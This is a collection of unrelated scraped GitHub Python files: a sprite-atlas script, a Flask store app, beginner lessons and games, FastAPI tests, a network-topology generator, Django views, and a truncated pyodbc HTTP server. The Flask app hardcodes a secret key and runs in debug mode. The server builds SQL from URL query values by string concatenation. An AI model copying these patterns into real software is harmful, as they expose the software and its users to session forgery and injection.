os.path.dirname(__file__)\nPARENT_DIRECTORY = os.path.dirname(DIRECTORY)\n\nif (DIRECTORY.endswith(\"samples\")):\n sys.path.append(PARENT_DIRECTORY)\n\n\nfrom sprite.component import SpriteComponent\nfrom sprite.atlas import Atlas\n\n\nIMG_DIR = os.path.join(DIRECTORY, \"img\")\nSHEET_PATH = os.path.join(DIRECTORY, \"sample_atlas.png\")\nMETA_PATH = os.path.join(DIRECTORY, \"sample_atlas.json\")\n\n\n\n\n\ndef make_atlas():\n a = Atlas(\"SAMPLE SPRITE\\n{size}\", min_size=(128, 128))\n for filename in os.listdir(IMG_DIR):\n filepath = os.path.join(IMG_DIR, filename)\n name = filename.split(\".\")[0]\n component = SpriteComponent(name, filepath=filepath)\n a.add_component(component)\n a.dump_atlas(SHEET_PATH)\n with open(META_PATH, \"w\") as f:\n json.dump(a.get_meta(), f, indent=4)\n\n\n\nif __name__ == \"__main__\":\n make_atlas()\n\n","repo_name":"drekels/python-sprite","sub_path":"samples/make_atlas.py","file_name":"make_atlas.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16468715899","text":"from itertools import count, product\nfrom operator import mod\nimport re\nfrom flask import Flask, redirect, url_for, request, render_template, session\nfrom flask.helpers import flash\nfrom flask_wtf import form\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql.operators import isnot\nfrom sqlalchemy.util.langhelpers import method_is_overridden\nfrom 
wtforms.validators import Email\nfrom forms import SignInForm, SignUpForm,AddProductForm,EditProductForm,OrderForm\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport os\nfrom werkzeug.utils import secure_filename\nimport fireStore\n\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8192hdw8y31993r9128yw98y3yewe13'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'app.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\nimport models\n\n\n#config firebase\n\n\n\ndef sumOrder(user):\n    carts=db.session.query(models.Cart).filter_by(user_id=user.user_id).all()\n    sum=0\n    for c in carts:\n        sum=sum+c.count*db.session.query(models.Product).filter_by(product_id=c.product_id).first().price\n    return sum\n    \n\n    \n\n@app.route(\"/\",methods=['POST','GET'])\ndef hello_world():\n    userImg = \"../static/images/guest.png\"\n    user_id = session.get('user') \n    user=db.session.query(models.User).filter_by(user_id=user_id).first()\n    products = db.session.query(models.Product).all()\n    pImgs=[]\n    for p in products:\n        pImgs.append(fireStore.getProductImg(p.product_id))\n    if user_id:\n        userImg=fireStore.getUserImg(user_id) \n        return render_template('homepage.html', userImg=userImg, user=user, products=products, pImgs=pImgs)\n    \n    return render_template('homepage.html', userImg=userImg, user=user, products=products, pImgs=pImgs)\n    \n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n    form = SignInForm()\n    userImg = \"../static/images/guest.png\"\n    if form.validate_on_submit():\n        _email = form.inputEmail.data\n        _password = form.inputPassword.data\n        \n        user = db.session.query(models.User).filter_by(email=_email).first()\n        if user is None:\n            flash(\"❌ Your email does not exist! Check it again or create another account!\")\n        elif user.check_password(_password): \n            session['user']=user.user_id \n            return redirect(url_for('user'))\n        else:\n            flash(\"Wrong password\")\n\n\n    return render_template('login.html', form=form, userImg=userImg)\n\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n    form = SignUpForm()\n    userImg = \"../static/images/guest.png\"\n    if form.validate_on_submit():\n        if form.inputPassword.data == form.inputConfirmPassword.data:\n            _fullname = form.inputFullName.data\n            _email = form.inputEmail.data\n            _phone= form.inputPhone.data\n            _addr=form.inputAddress.data\n            _password = form.inputPassword.data\n            if db.session.query(models.User).filter_by(email=_email).count()==0:\n                user=models.User(full_name=_fullname,email=_email,role=\"customer\")\n                user.set_password(_password)\n                db.session.add(user)\n                db.session.commit()\n                user=db.session.query(models.User).filter_by(email=_email).first()\n                db.session.add(models.Phone(user_id=user.user_id,phonenumber=_phone))\n                db.session.add(models.Address(user_id=user.user_id,address=_addr))\n                db.session.commit()\n                fireStore.putDefaultImg(user.user_id)\n                session['user']=user.user_id\n                return redirect(url_for('user'))\n            else:\n                flash(\"❌ Your email already exists! 
Please login.\")\n else:\n flash(\"❌ Confirm password is incorrect!\")\n return render_template('signup.html', form=form, userImg=userImg)\n\n\n\n@app.route(\"/user\", methods=['GET', 'POST'])\ndef user():\n user_id = session.get('user') \n user=db.session.query(models.User).filter_by(user_id=user_id).first()\n userImg = fireStore.getUserImg(str(user_id))\n if user is None: \n return redirect(\"/\") \n \n else:\n if request.method == 'POST':\n if \"accept\" in request.form: \n if request.files['file'].filename != '': \n f = request.files['file']\n f.save(secure_filename(\"user\"+str(user.user_id)+\".png\")) \n fireStore.putUserImG(user_id)\n os.remove(\"user\"+str(user.user_id)+\".png\")\n return redirect(url_for('user')) \n elif \"cancel\" in request.form:\n return redirect(url_for('user')) \n elif \"logout\" in request.form:\n session['user']=0\n return redirect('/') \n\n return render_template(\"user.html\",userImg=userImg, user=user)\n \n \n\n@app.route(\"/ProductManager\", methods=['GET', 'POST'])\ndef productManager():\n form= AddProductForm()\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n if user.role==\"manager\":\n products=db.session.query(models.Product).all()\n pImgs=[]\n for p in products:\n pImgs.append(fireStore.getProductImg(p.product_id))\n \n if form.submit.data and form.validate(): \n product=models.Product(product_name=form.inputName.data,description=form.inputDes.data, price=form.inputPrice.data, status=\"Active\")\n db.session.add(product)\n db.session.commit()\n p_id=db.session.query(models.Product).count()\n f=request.files['file']\n f.save(secure_filename(\"product\"+str(p_id)+\".png\")) \n fireStore.putProductImg(p_id)\n os.remove(\"product\"+str(p_id)+\".png\")\n return redirect('ProductManager') \n \n return render_template(\"productManager.html\",userImg=userImg, user=user, products=products, pImgs=pImgs, form=form)\n else:\n return redirect(\"/\")\n\n@app.route(\"/edit/\", methods=['GET', 'POST'])\ndef edit(product_id):\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n product=db.session.query(models.Product).filter_by(product_id=product_id).first()\n pImg=fireStore.getProductImg(product_id)\n form=EditProductForm()\n if user.role==\"manager\": \n \n form.inputStatus.choices=[(1,\"Active\"),(2,\"Inactive\")] \n if form.validate_on_submit(): \n if form.inputStatus.data==1:\n product.product_name=form.inputName.data\n product.description=form.inputDes.data\n product.price=form.inputPrice.data\n product.status='Active'\n flash(form.inputName.data)\n \n else:\n product.product_name=form.inputName.data\n product.description=form.inputDes.data\n product.price=form.inputPrice.data\n product.status='Inactive' \n \n db.session.commit() \n \n if request.files['file'].filename != '':\n f=request.files['file']\n f.save(secure_filename(\"product\"+str(product.product_id)+\".png\")) \n fireStore.putProductImg(product.product_id)\n os.remove(\"product\"+str(product.product_id)+\".png\")\n return redirect('/ProductManager') \n return render_template(\"editProduct.html\",userImg=userImg, user=user, form=form, product=product, pImg=pImg)\n else:\n return redirect(\"/\")\n\n@app.route(\"/product/\", methods=['GET', 'POST'])\ndef product(product_id):\n userImg = \"../static/images/guest.png\"\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n if user:\n userImg = 
fireStore.getUserImg(str(user.user_id))\n    product=db.session.query(models.Product).filter_by(product_id=product_id).first()\n    pImg=fireStore.getProductImg(product_id)\n    if request.method=='POST':\n        if user:\n            if \"cart\" in request.form:\n                c=db.session.query(models.Cart).filter_by(user_id=user.user_id, product_id=product_id).first()\n                if c:\n                    c.count = c.count + 1\n                else:\n                    c=models.Cart(product_id=product_id, user_id=user.user_id, count=1)\n                    db.session.add(c)\n                db.session.commit()\n        else:\n            flash(\"Please login at first!\")\n            return redirect('/login')\n    return render_template(\"product.html\",userImg=userImg, user=user, product=product, pImg=pImg)\n\n@app.route(\"/cart\", methods=['GET', 'POST'])\ndef cart():\n    user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n    userImg = fireStore.getUserImg(str(user.user_id))\n\n    if user: \n        products = db.session.query(models.Product).all()\n        carts = db.session.query(models.Cart).filter_by(user_id=user.user_id).all()\n        pImgs=[]\n        for p in products:\n            pImgs.append(fireStore.getProductImg(p.product_id))\n\n        if request.method=='POST':\n            for c in list(carts):\n                if \"+\"+str(c.product_id) in request.form:\n                    c.count=c.count+1\n                elif \"-\"+str(c.product_id) in request.form:\n                    if c.count >1:\n                        c.count=c.count-1\n                elif \"r\"+str(c.product_id) in request.form:\n                    db.session.delete(c)\n                    carts.remove(c)\n            db.session.commit()\n\n        return render_template(\"cart.html\",products=products, carts=carts, user=user, userImg=userImg, pImgs=pImgs)\n    else:\n        return redirect('/')\n\n@app.route(\"/placeOrder\", methods=['GET', 'POST'])\ndef placeOrder():\n    user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n    userImg = fireStore.getUserImg(str(user.user_id))\n    if user: \n        products = db.session.query(models.Product).all()\n        carts = db.session.query(models.Cart).filter_by(user_id=user.user_id).all()\n        pImgs=[]\n        \n        for p in products:\n            pImgs.append(fireStore.getProductImg(p.product_id))\n        \n        \n        if request.method=='POST':\n            if len(carts)==0:\n                flash(\"Please add product to your cart\")\n            elif \"order\" in request.form: \n                order=models.Order(user_id=user.user_id,Status=\"Delivering\",phone=request.form.get('phone'), address=request.form.get('address'))\n                db.session.add(order)\n                db.session.commit()\n                order=db.session.query(models.Order).filter_by(order_id=len(db.session.query(models.Order).all())).first()\n                for c in carts:\n                    orderProduct=models.OrderProduct(order_id=order.order_id,product_id=c.product_id,count=c.count)\n                    db.session.delete(c)\n                    db.session.add(orderProduct)\n                db.session.commit()\n                return redirect('/')\n            \n        \n\n        return render_template(\"place.html\",products=products, carts=carts, user=user, userImg=userImg, pImgs=pImgs, sum=sumOrder(user),form=form)\n    else:\n        return redirect('/')\n\ndef total(order_id):\n    order=db.session.query(models.Order).filter_by(order_id=order_id).first()\n    total=0\n    for p in order.order_products:\n        total=total+p.product.price*p.count\n    return total\n\n@app.route(\"/order\", methods=['GET', 'POST'])\ndef order():\n    user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n    userImg = fireStore.getUserImg(str(user.user_id))\n    if user is not None: \n        return render_template(\"order.html\",user=user,userImg=userImg)\n    else:\n        return redirect(\"/\")\n\n@app.route(\"/order/detail/<order_id>\", methods=['GET', 'POST'])\ndef detail(order_id):\n    user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n    userImg = fireStore.getUserImg(str(user.user_id))\n    
order=db.session.query(models.Order).filter_by(order_id=order_id).first()\n \n if user is not None and order.user_id == user.user_id:\n pImgs=[]\n for p in order.order_products:\n pImgs.append(fireStore.getProductImg(p.product_id))\n return render_template(\"detail.html\",user=user,userImg=userImg, order=order)\n else:\n return redirect(\"/\")\n\n\n\n\nif __name__ == '__main__': \n app.run(host='127.0.0.1', port='5050', debug=True)\n","repo_name":"thuanguyenit/FlaskStore","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8563572722","text":"#Operador de Adicao + \na = 20\nb = 30\nc = a + b\nprint(f\"A Soma de {a} + {b} = \", c)\n\n#Operador de Subtracao -\ne = 30\nf = 20\ng = e - f\nprint(f\"A Subtracao de {e} - {f} = \", g)\n\n#Operador de multiplicacao *\nd = 30\ns = 10\nml = d * s\nprint(f\"A Multiplicacao de {d} * {s} = \", ml)\n\n#Operador de Divisao /\ndv = 30\ndl = 10\ndr = dv / dl\nprint(f\"A Divisao de {dv} / {dl} = \", dr)\n\n#Operador de Exponenciacao **\nev = 30\ner = 3\nerr = ev**er\nprint(f\"A Exponenciacao de {ev}**{er} = \", err)\n\n#Operador Modulo //\nmv = 50\nmr = 5\nmrr = mv%mr\nprint(f\"O modulo de {mv} // {mr} = \", mrr)","repo_name":"azevedotau-ai/programming_learn_path","sub_path":"Basic/ArithmeticOperators.py","file_name":"ArithmeticOperators.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30850389500","text":"# pylint: disable=no-self-use\n# - pylint test classes must pass self, even if unused.\n# pylint: disable=invalid-name\n# - this module has some pretty verbose names,\n# shrinking them feels worse than disabling this lint.\n# pylint: disable=logging-fstring-interpolation\n# - honestly just annoying to use lazy(%) interpolation.\n\"\"\"\nEndpoint tests for get event by location query.\n\"\"\"\nimport logging\nfrom typing import Dict, Any\nfrom fastapi.testclient import TestClient\nfrom requests.models import Response as HTTPResponse\n\nfrom app import app\nimport models.events as event_models\n\nclient = TestClient(app)\n\n\ndef get_location_query_from_event(event_form: event_models.Event,\n radius) -> Dict[str, Any]:\n \"\"\"\n Returns a valid json query given a radius and an event form.\n \"\"\"\n location = event_form.location\n query_data = {\n \"lat\": location.latitude,\n \"lon\": location.longitude,\n \"radius\": radius\n }\n return query_data\n\n\ndef check_event_locations_response_valid(response: HTTPResponse) -> bool:\n \"\"\"\n Checks the response for a valid list of events and returns\n true if all the checks pass, else false.\n \"\"\"\n try:\n assert response.status_code == 200\n response_json = response.json()\n assert \"events\" in response_json\n assert response_json[\"events\"]\n assert len(response_json[\"events\"]) > 0\n return True\n except AssertionError as assert_error:\n debug_msg = f\"failed at: {assert_error}. resp json: {response.json()}\"\n logging.debug(debug_msg)\n return False\n\n\ndef get_query_event_location_url() -> str:\n \"\"\"\n Returns the endpoint's url string\n \"\"\"\n return \"/events/location\"\n\n\ndef get_invalid_query_from_event(event_form: event_models.Event,\n radius) -> Dict[str, Any]:\n \"\"\"\n Returns an out of bounds (i.e. 
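# Editor's note on the ArithmeticOperators record above: its last block is
# labeled "Operador Modulo //" and prints "O modulo de {mv} // {mr}", yet the
# code computes mv % mr. In Python, % is the remainder operator and // is floor
# division, two different operations. A minimal self-contained illustration:
dividend, divisor = 50, 7
print(f"{dividend} % {divisor} = {dividend % divisor}")    # remainder: 1
print(f"{dividend} // {divisor} = {dividend // divisor}")  # floor division: 7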
invalid) query dict from a given event.\n \"\"\"\n location = event_form.location\n bad_query_data = {\n \"lat\": location.latitude + 1000,\n \"lon\": location.longitude - 1000,\n \"radius\": radius\n }\n\n return bad_query_data\n\n\nclass TestEventsLocation:\n def test_events_location_success(self,\n registered_event: event_models.Event):\n \"\"\"\n Tries to query an existing event by it's approximate location,\n expecting success.\n \"\"\"\n radius = 10\n query_data = get_location_query_from_event(registered_event, radius)\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params=query_data)\n\n assert check_event_locations_response_valid(response)\n\n def test_events_location_empty_data_failure(\n self, registered_event: event_models.Event):\n \"\"\"\n Tries to query events by location but sends no args, expecting failure\n \"\"\"\n del registered_event # unused fixture result\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params={})\n assert not check_event_locations_response_valid(response)\n\n def test_events_location_no_events_failure(\n self, unregistered_event: event_models.Event):\n \"\"\"\n Tries to query in a massive radius but without any events registered,\n expecting an empty response\n \"\"\"\n huge_radius = 10_000\n query_data = get_location_query_from_event(unregistered_event,\n huge_radius)\n\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params=query_data)\n assert not check_event_locations_response_valid(response)\n\n def test_events_location_invalid_lat_lon(\n self, registered_event: event_models.Event):\n \"\"\"\n Tries to query with an invalid lat/lon range, expecting failure\n \"\"\"\n radius = 10\n invalid_query_data = get_invalid_query_from_event(\n registered_event, radius)\n\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params=invalid_query_data)\n\n assert not check_event_locations_response_valid(response)\n assert response.status_code == 422\n","repo_name":"SparkDevTeams/underline-backend","sub_path":"tests/test_events_location.py","file_name":"test_events_location.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70121979929","text":"# Libraries\nfrom sympy.combinatorics import GrayCode\nimport sys\nimport math\nimport copy\n\n# Custom files\nfrom place_and_route import place_and_route\nfrom create_tile import create_tile\nfrom error import error, warning\n\n# Map for gray-code like ordering of rows and columns\nrow_map = None\ncol_map = None\n\n# Auxiliary function to transform bit-lists (tile-ids) to row and column of said tile\ndef bin_to_rc(binary, rows, cols):\n\tglobal row_map\n\tglobal col_map\n\tbin_row = binary[:int(math.log2(rows))]\n\tbin_col = binary[int(math.log2(rows)):]\n\trow = row_map[int(bin_row, 2)]\n\tcol = col_map[int(bin_col, 2)]\n\treturn (row, col)\n\t\n# Generate a Hypercube topology\ndef generate(module_name, area, n_endpoints, tech, prot, bw, freq, rows, cols, config):\n\tglobal row_map\n\tglobal col_map\n\tprint(\"Generating Hypercube Topology...\")\n\n\t# VALIDATION: Hypercube specific input validation\n\tif math.log2(rows) % 1 != 0 or math.log2(cols) % 1 != 0:\n\t\tmsg = \"rows and columns must both be powers of 2\"\n\t\terror(__file__, msg)\n\n\t# Compute size of bit-vectors that represent tile IDs.\n\trow_dimensions = int(math.log2(rows))\n\tcol_dimensions = 
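# Editor's note: the test record above exercises an events-by-location endpoint
# that takes "lat", "lon", and "radius" query parameters. The server-side filter
# itself is not part of this record, so the following is only a sketch of the
# usual great-circle (haversine) distance check; the function name and the
# kilometre units are assumptions, not code from the repository.
import math

def within_radius_km(lat1, lon1, lat2, lon2, radius_km):
    """Return True if two points lie within radius_km on a spherical Earth."""
    earth_radius_km = 6371.0
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2.0 * earth_radius_km * math.asin(math.sqrt(a)) <= radius_km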
int(math.log2(cols))\n\tdimensions = row_dimensions + col_dimensions \n\t\n\t# Compute gray code for rows and columns\n\trow_gc = list(GrayCode(row_dimensions).generate_gray())\n\tcol_gc = list(GrayCode(col_dimensions).generate_gray())\n\n\t# Maps to arrange rows and columns in gray code style\n\t# This ensures that mesh-like links are always part of the Hypercube topology\n\trow_map = {int(row_gc[i],2) : i for i in range(rows)}\n\tcol_map = {int(col_gc[i],2) : i for i in range(cols)}\n\n\t# Create Tile...\n\ttile_name = module_name\n\t# ...Add ports for mesh-like connections\n\tmports = []\n\tsports = []\n\tmports.append({\"face\" : \"north\", \"align\" : -1})\n\tsports.append({\"face\" : \"north\", \"align\" : 1})\n\tmports.append({\"face\" : \"east\", \"align\" : -1})\n\tsports.append({\"face\" : \"east\", \"align\" : 1})\n\tmports.append({\"face\" : \"south\", \"align\" : 1})\n\tsports.append({\"face\" : \"south\", \"align\" : -1})\n\tmports.append({\"face\" : \"west\", \"align\" : 1})\n\tsports.append({\"face\" : \"west\", \"align\" : -1})\n\t# ...Add ports for remaining column-links\n\tcol_hop_start_id = 4\n\tnports = max(row_dimensions-2,0)\n\tfor i in range(nports):\n\t\tmports.append({\"face\" : \"north\", \"align\" : -1})\n\t\tsports.append({\"face\" : \"north\", \"align\" : 1})\n\t# ...Add ports for remaining row-links\n\trow_hop_start_id = 4 + nports\n\tnports = max(col_dimensions-2,0)\n\tfor i in range(nports):\n\t\tmports.append({\"face\" : \"east\", \"align\" : -1})\n\t\tsports.append({\"face\" : \"east\", \"align\" : 1})\n\t# ...Create tile\n\tcreate_tile(tile_name, area, n_endpoints, mports, sports)\n\t\n\t# Compose a list of edges that are part of the hypercube topology\n\tedges = []\n\tfor i in range(2**dimensions):\n\t\tstart = list(bin(i)[2:]) \n\t\tstart = [\"0\" for j in range(dimensions - len(start))] + start\n\t\tfor j in range(dimensions):\t\n\t\t\tend = copy.deepcopy(start)\n\t\t\tend[j] = \"1\" if end[j] == \"0\" else \"0\"\n\t\t\tedges.append((start, end))\n\n\t# Maps a tile to its lowest available port-id for column and row links\n\tm_col_hop_id = {(row,col) : col_hop_start_id for row in range(rows) for col in range(cols)}\n\ts_col_hop_id = {(row,col) : col_hop_start_id for row in range(rows) for col in range(cols)}\n\tm_row_hop_id = {(row,col) : row_hop_start_id for row in range(rows) for col in range(cols)}\n\ts_row_hop_id = {(row,col) : row_hop_start_id for row in range(rows) for col in range(cols)}\n\n\t# Add connections...\n\tconnections = []\n\tfor edge in edges:\n\t\t# ...Extract start and end tile ids\n\t\t(start, end) = edge\n\t\tstart = \"\".join(start)\n\t\tend = \"\".join(end)\n\t\t# ...Translate tile ids to tile locations\n\t\t(srow,scol) = bin_to_rc(start, rows, cols)\n\t\t(erow,ecol) = bin_to_rc(end, rows, cols)\n\t\t# ...Set ports for mesh-like connections\n\t\tif scol == ecol and (srow + 1) % rows == erow:\n\t\t\tsport = 0\n\t\t\teport = 2\n\t\telif scol == ecol and (srow - 1) % rows == erow:\n\t\t\tsport = 2\n\t\t\teport = 0\n\t\telif srow == erow and (scol + 1) % cols == ecol:\n\t\t\tsport = 1\n\t\t\teport = 3\n\t\telif srow == erow and (scol - 1) % cols == ecol:\n\t\t\tsport = 3\n\t\t\teport = 1\n\t\t# ...Set ports for remaining column-connections\n\t\telif scol == ecol:\n\t\t\tsport = m_col_hop_id[(srow,scol)]\n\t\t\tm_col_hop_id[(srow,scol)] += 1\n\t\t\teport = s_col_hop_id[(erow,ecol)]\n\t\t\ts_col_hop_id[(erow,ecol)] += 1\n\t\t# ...Set ports for remaining row-connections\n\t\telif srow == erow:\n\t\t\tsport = 
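# Editor's note: the hypercube generator above routes row and column indices
# through sympy's GrayCode so that tiles adjacent in the mesh differ in exactly
# one ID bit, which is what makes the mesh links a subset of the hypercube
# edges. The invariant is easy to check with the classic binary-reflected
# formula g(i) = i ^ (i >> 1), which produces the same sequence:
def gray(i):
    return i ^ (i >> 1)

for i in range(7):
    diff = gray(i) ^ gray(i + 1)
    assert diff != 0 and diff & (diff - 1) == 0  # exactly one bit flips
    print(f"{gray(i):04b} -> {gray(i + 1):04b}")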
m_row_hop_id[(srow,scol)]\n\t\t\tm_row_hop_id[(srow,scol)] += 1\n\t\t\teport = s_row_hop_id[(erow,ecol)]\n\t\t\ts_row_hop_id[(erow,ecol)] += 1\n\t\telse:\n\t\t\tmsg = \"Invalid connection direction\"\n\t\t\terror(__file__, msg)\n\t\tconnections.append(((srow,scol,sport),(erow,ecol,eport)))\n\n\t# Place and Route\n\tplace_and_route(module_name, tile_name, tech, prot, bw, freq, rows, cols, connections)\n\n### Main ###\nif __name__ == \"__main__\":\n\targs = sys.argv\n\tif len(args) < 10:\n\t\tprint(\"Usage: python generate_hypercube.py <module_name> <area> <#endpoints>\"+\\\n\t\t\t \" <tech> <prot> <bw> <freq> <rows> <cols>\")\n\t\tsys.exit()\n\n\tgenerate(args[1], int(args[2]), int(args[3]), args[4], args[5], int(args[6]), \n\t\t\tint(float(args[7])), int(args[8]), int(args[9]), [])\n\n","repo_name":"eanorige/sparse_hamming_graph_public","sub_path":"src/generate_hypercube.py","file_name":"generate_hypercube.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"71277118488","text":"from django.shortcuts import render\r\nfrom .models import Post, comment\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .forms import CommentForm\r\nfrom accounts.models import userTips\r\ndef blog(request):\r\n\treturn render(request, 'blog/blog.html', {'posts':Post.objects.all()})\r\n\t\r\n\r\n@login_required\r\ndef single_blog(request,id):\r\n    post = Post.objects.get(id=id)\r\n    comments = comment.objects.filter(post=post)\r\n    if request.method == \"POST\":\r\n        add_comment = CommentForm(request.POST,request.FILES)\r\n        if add_comment.is_valid():\r\n            add_comment = add_comment.save(commit=False)\r\n            add_comment.user = userTips.objects.get(user=request.user)\r\n            add_comment.post = post\r\n            add_comment.save()\r\n    return render(request, 'blog/single_blog.html', {'post':post,'comments':comments})\r\n\t","repo_name":"Abdelrahman-Moharram/Learn-Django","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"31758987935","text":"import random\r\nimport os\r\n\r\ndef resultado(ganhou, empate, perdeu):\r\n    print(\"\\nResultado:\")\r\n    print(f\"Vitórias: {ganhou}\")\r\n    print(f\"Empates: {empate}\")\r\n    print(f\"Derrotas: {perdeu}\\n\")\r\n    \r\n\r\ndef escolha(numero):\r\n    if numero == 1:\r\n        return \"Pedra\"\r\n    elif numero == 2:\r\n        return \"Papel\"\r\n    else:\r\n        return \"Tesoura\"\r\n\r\ndef jogar():\r\n    opcao = 0\r\n    ganhou = 0\r\n    perdeu = 0\r\n    empate = 0\r\n\r\n    while opcao != 4:\r\n        resposta = input(\"--- Escolha uma opção: ---\\n 1 - Pedra\\n 2 - Papel\\n 3 - Tesoura\\n 4 - Zerar\\nOpção: \")\r\n        os.system(\"cls\")\r\n        \r\n        if resposta:\r\n            opcao = int(resposta)\r\n        else:\r\n            opcao = 99\r\n\r\n        if opcao == 4:\r\n            break\r\n        elif opcao >= 1 and opcao <= 3:\r\n            maquina = random.randint(1, 3)\r\n            escolha_maquina = escolha(maquina)\r\n            escolha_jogador = escolha(opcao)\r\n\r\n            print(f\"\\nVocê: {escolha_jogador}\\nMáquina: {escolha_maquina}\\n\")\r\n\r\n            if opcao == 1:\r\n                if maquina == 3:\r\n                    ganhou += 1\r\n                    print(\"Uhuu, você ganhou!!\")\r\n                elif maquina == 1:\r\n                    empate += 1\r\n                    print(\"Empatou\")\r\n                else:\r\n                    perdeu += 1\r\n                    print(\"Perdeu\")\r\n            \r\n            elif opcao == 2:\r\n                if maquina == 1:\r\n                    ganhou += 1\r\n                    print(\"Uhuu, você ganhou!!\")\r\n                elif maquina == 2:\r\n                    empate += 1\r\n                    print(\"Empatou\")\r\n                else:\r\n                    perdeu += 1\r\n                    print(\"Perdeu\")\r\n            \r\n            elif opcao == 3:\r\n                if maquina == 2:\r\n                    ganhou 
+= 1\r\n print(\"Uhuu, você ganhou!!\")\r\n elif maquina == 3:\r\n empate += 1\r\n print(\"Empatou\")\r\n else:\r\n perdeu += 1\r\n print(\"Perdeu\")\r\n \r\n else:\r\n print(\"Opção inválida\")\r\n\r\n resultado(ganhou, empate, perdeu)\r\n\r\n resultado(ganhou, empate, perdeu)\r\n print(\"Jogo Encerrado, muito obrigado!\\n\")\r\n\r\nwhile True:\r\n print(\"Jokempô(Rock - Paper- Sicssor)\\n\")\r\n \r\n print(\"Escolha uma opção: \")\r\n opcao_jogo = int(input(\"1 - Iniciar Jogo \\n2 - Para sair\\n\"))\r\n os.system(\"cls\")\r\n \r\n if opcao_jogo == 1:\r\n jogar()\r\n else:\r\n print(\"Você está desligando o jogo, muito obrigado e volte sempre!\\n\")\r\n print(\"JOGO FEITO POR: ALOISIO VITORIO\")\r\n input()\r\n break\r\n","repo_name":"Aloisio12/Jokempo_Rock-Paper-Sicssor_with-Python","sub_path":"Jokempô(Rock - paper- sissors).py","file_name":"Jokempô(Rock - paper- sissors).py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32418331228","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\r\nfrom urllib.parse import urlparse\r\nimport pyodbc\r\n\r\nconn = pyodbc.connect('Driver={SQL Server};'\r\n 'Server=DESKTOP-1RH354G;'\r\n 'Database=digiDB;'\r\n 'Trusted_Connection=yes;')\r\n\r\n\r\n\r\n\r\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\r\n _columns = {\r\n \"digital_commodities\": [\"commodity_id\", \"name\", \"number_sold\", \"price\", \"number_in_store\", \"color\", \"weight\",\r\n \"immediate_sending\", \"brand\", \"promotion_id\"],\r\n \"laptops\": [\"graphics\", \"cpu\", \"ram\"],\r\n \"mobiles\": [\"ram\", \"internal_storage\", \"os\", \"camera_resolution\"],\r\n \"case_covers\": [\"material\", \"size\", \"mobile\", \"mobile_os\"],\r\n \"assembled_cases\": [\"ram\", \"storage\"],\r\n \"computers_accessories\": [],\r\n \"external_hards\": [\"capacity\"],\r\n \"keyboards\": [\"connection_type\", \"background_light\"],\r\n \"monitors\": [\"screen_size\", \"resolution\"],\r\n \"phone_accessories\": [],\r\n \"phone_holder_bases\": [\"material\"],\r\n \"powerbanks\": [\"capacity\", \"number_ports\"]\r\n }\r\n\r\n def do_GET(self):\r\n bits = urlparse(self.path)\r\n cursor, columns_names = self.database(self.parse_query(bits.query.split('&')))\r\n\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n html_string = self.fill_html_string(cursor , columns_names)\r\n self.wfile.write(bytes(html_string, \"utf-8\"))\r\n\r\n\r\n def do_POST(self):\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n def do_PUT(self):\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n def parse_query(self, query: list):\r\n if len(query) != 3:\r\n return -1\r\n\r\n type_value = query[0][5:]\r\n name_value = query[1][5:]\r\n immediate_value = query[2][10:]\r\n return {'type_value': type_value,\r\n 'name_value': name_value,\r\n 'immediate_value': immediate_value}\r\n\r\n def database(self, fields: dict):\r\n if fields == -1:\r\n return -1 , -1\r\n cursor = conn.cursor()\r\n\r\n select_columns = \"\"\r\n select_columns_list = []\r\n for name in self._columns[\"digital_commodities\"]:\r\n if name == \"commodity_id\":\r\n select_columns += \" c.\"\r\n else:\r\n select_columns += \" \"\r\n select_columns += name + \",\"\r\n select_columns_list.append(name)\r\n\r\n 